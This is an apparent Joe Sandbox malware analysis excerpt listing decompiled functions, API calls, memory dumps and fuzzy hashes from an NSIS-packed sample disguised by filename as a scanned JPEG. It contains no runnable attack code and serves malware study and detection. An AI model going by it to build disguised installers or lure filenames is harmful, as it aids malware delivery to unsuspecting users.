Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E20

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
Instruction ID: 85430ec79d7d493a62f5c90f0650e63f0d0faf8675fc45e27afe54df9b067c18
Opcode Fuzzy Hash: b58b48af80338fc5c361f5738cf0c456ed06fa613522f8e9690158e9f906b927
Instruction Fuzzy Hash: CD019271948341AFE7009BB0AE49E9A7FB4DB55305F108479F101BB2E2CA7841909F2F

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3e98e30495b11ed96e9f76979364d05835fcfdae40f81675b092c7602420f547
Instruction ID: 236c2df16a83e1707d8be159829b3a1190eecd98233effbe731bed35476ffb6f
Opcode Fuzzy Hash: 3e98e30495b11ed96e9f76979364d05835fcfdae40f81675b092c7602420f547
Instruction Fuzzy Hash: 01F0ECB2A04115BFDB01ABA4DE89DEFBBBCEB44305B044466F601F2191C6749D018B79

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction ID: 3953527ca16890ec8ab59ce35194567eea46ff7bd29c8182c04533b3460f2dbd
Opcode Fuzzy Hash: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction Fuzzy Hash: 0C21A2B1E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7886418F28

Function 004059F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77

Part of subcall function 0040599B: CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2

lstrlenA.KERNEL32(shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A43
GetFileAttributesA.KERNEL32(shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,shovel\Undrinking.veg,00000000,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\), ref: 00405A53

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059F0
shovel\Undrinking.veg, xrefs: 004059F6, 004059FB, 00405A01, 00405A3C, 00405A42, 00405A4A, 00405A52

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$shovel\Undrinking.veg
API String ID: 3248276644-137636835
Opcode ID: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
Instruction ID: b63be7d1610f08e16cf97c71acc26f165dc25b1935d551b17c13779f5e49e68e
Opcode Fuzzy Hash: 3317ae5885fe5557bfe6bd01748d3a5579ce53a26439151f89887cafc9669dc2
Instruction Fuzzy Hash: 24F0C826315D6156C622237A2C86AAF5644CE87324709473FF851B22D2DA3C89539E7E

Function 00405902 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405908
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 00405911
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405922

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405902

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction ID: bd87ec63c1f35a98f82bf41febae71866d1aa3f85b5b5a32f8f6ee96ed89cac6
Opcode Fuzzy Hash: 7d86c92969947f3077f9a158046bd063bc506289d00538d24d19a3cace2b88b5
Instruction Fuzzy Hash: C6D0A9A26069316ED2022315AC09EEB2A0CCF16319B040022F600B62A2CA3C1D418BFE

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
Instruction ID: 3f870e478545c218cbf8d1d8c83e1046b3ec80cd8b5b23ff6fd5b08b87a912e1
Opcode Fuzzy Hash: 7491e01b77a4f54db0745fefa8ef52e761586eb4c2d62f00184cdfe08c81871e
Instruction Fuzzy Hash: 76112B36504109FBEF129F91CE09F9E7B69AB48340F104072BE05B51E0E7B5AE11ABA9

Function 0040599B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
CharNextA.USER32(00000000), ref: 004059AE
CharNextA.USER32(00000000), ref: 004059C2

Strings

shovel\Undrinking.veg, xrefs: 0040599C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharNext
String ID: shovel\Undrinking.veg
API String ID: 3213498283-2939288235
Opcode ID: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
Instruction ID: b251aa3e985fa887116ab65003500a8f213bfb7e3cc2aa31c3213714dbeb82a6
Opcode Fuzzy Hash: 10bc9b63e27fd2895a2a79afc72dfc96a7ed1041d934c6f985c348dce719f526
Instruction Fuzzy Hash: 22F0CDD1908F60AAFB3252684C45B675E88CB56371F1800ABE240A62C282B848408FAA

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
Instruction ID: f5aaf9fad63db9690dbd9b3812727a8d708a0014de572c02bbf4379bbf317f26
Opcode Fuzzy Hash: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
Instruction Fuzzy Hash: 42F05E70906220ABCA217F64FE4CACB7BA4FB45B527014576F145B11E4C3799C8ACBDD

Function 00405005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405034
CallWindowProcA.USER32(?,?,?,?), ref: 00405085

Part of subcall function 00404055: SendMessageA.USER32(00010412,00000000,00000000,00000000), ref: 00404067

Strings

, xrefs: 00405015

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction ID: 5be162d7cd7d71c2ccb341d7130f59d8c0266776e22eb2788f3d6f03133d665e
Opcode Fuzzy Hash: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction Fuzzy Hash: 2D019A7150060DABDF209F20DC80EAF3A25EB80354F204036FA14792D0C73A8891AEAA

Function 00405E51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406095,80000002), ref: 00405E97
RegCloseKey.ADVAPI32(?,?,00406095,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 00405EA2

Strings

Call, xrefs: 00405E54, 00405E88

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
Instruction ID: d4591e39b0d39d961dff3dfa4a9982e28399459fd93e33a5317855cc39530622
Opcode Fuzzy Hash: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
Instruction Fuzzy Hash: 92019A72510609ABDF228F20CC09FDB3FA9EF48360F008026FA45A2190D338DA11CBA4

Function 00403703 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75953410,00000000,C:\Users\user\AppData\Local\Temp\,004036DB,004034F5,?,?,00000006,00000008,0000000A), ref: 0040371D
GlobalFree.KERNEL32(006ECEB0), ref: 00403724

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403703

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 35d1f02da0abf4a3a5ea65bd0cdd12c9264502c99e7b9c945f64e5a7c8fdc6a2
